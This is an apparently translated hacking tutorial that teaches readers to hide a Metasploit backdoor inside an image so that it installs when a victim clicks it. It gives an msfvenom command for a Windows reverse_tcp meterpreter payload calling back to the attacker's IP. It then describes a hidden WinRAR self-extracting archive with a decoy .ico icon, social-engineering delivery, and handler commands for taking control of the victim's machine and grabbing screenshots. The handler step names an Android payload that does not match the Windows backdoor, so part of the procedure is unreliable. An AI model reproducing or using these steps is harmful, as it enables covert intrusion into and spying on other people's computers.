How to insert a backdoor into an image is an attempt so that we can insert a backdoor into the victim’s device without being noticed. The technique of inserting images with a playload is often referred to as steganography.
If previously we have learned how to insert a backdoor into an application that is quite complicated. In this tutorial I make sure it will be able to, because the process is quite easy and short.
You only need to create a backdoor application from metasploit termux, then insert it into an image file. Next, just set the image to self-extracting.
Self extracting means that when the icon of this file is clicked, the compressed file inside will automatically be extracted.
The file icon is an .Ico gambar image
the compressed file is an ordinary image and a backdoor.
So when the .ico image is clicked what will appear is a normal image and the backdoor will run.
Understand, how does it work?
But unfortunately, .Ico images only support for windows (computers). So if the backdoor in the form of an image is sent to Android, it will have no effect. And it can’t be used to hack whatsapp termux.
Okay, now let’s get straight to the tutorial. Please follow the steps below for the steps:
How to Insert Backdoor Into Image Using Metasploit
1. Create a backdoor in metasploit
Please run the installed metasploit by writing the following command:
msfconsole
Then enter the command below to directly create a backdoor:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.245 LPORT=4444 -f exe > virus.exe
# Virus.exe you can change to another name, as long as the end remains .exe.
# LHOST replace with your IP address.
# LPORT just adjust.
After the backdoor is successfully created, move it to internal storage.
2. Convert image to .Ico
You can use the website http://icoconvert.com/
Immediately on the home page of the website, upload the image that you want to insert the backdoor.
Then press convert .ico and download the converted results.
3. Compress image and backdoor with image icon.ico
Here we can use win rar, because there is already an sfx (self extracting) archive option.
For the guide, please just follow the image below.
- Mark backdoor files and regular images then compress
- In the general WinRAR options select best and tick create sfx archive and press ok
- Scroll to the advanced menu and select sfx option
- Select the setup menu again and in the run after extraction box write the name of the backdoor file and the usual image file then ok
- Then slide to the text and icon menu and in the load sfx icon from the file box, select the previously converted .Ico image
- Next, slide back to the modes menu and select the hide all option
So far, the backdoor has been successfully inserted into the image.
The next step is to send a backdoor to your target.
How to send backdoor to target?
It’s up to you, the important thing is that it can be on the target device and make sure the target also opens it.
As a tip! Use social engineering so you can easily send the image file.
What to do after the image containing the backdoor is on the target device?
You just need to connect the backdoor with metasploit.
How to enter metasploit first with the following command.
msfconsole
Then enter the following command again.
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.43.245 set lport 4444 exploit
LHOST and LPORT adjust to what you used before when creating a backdoor.
Well, if the meterpreter appears on your metasploit, that means the backdoor is connected.
Then just enter the command what you want.
For example, to find out what device the target is using, you can enter the command sysinfo
And if you want to screenshot the target device, use the command screenshots.
For other Exploit commands, please see metasploit help. Or directly find out on the official website at metasploit.com
OK, now that we’ve learned how to insert a backdoor into an image, it’s very easy to understand, right? Now it’s your turn to practice it.
If there are difficulties, please ask through the comments column. Thanks for reading.
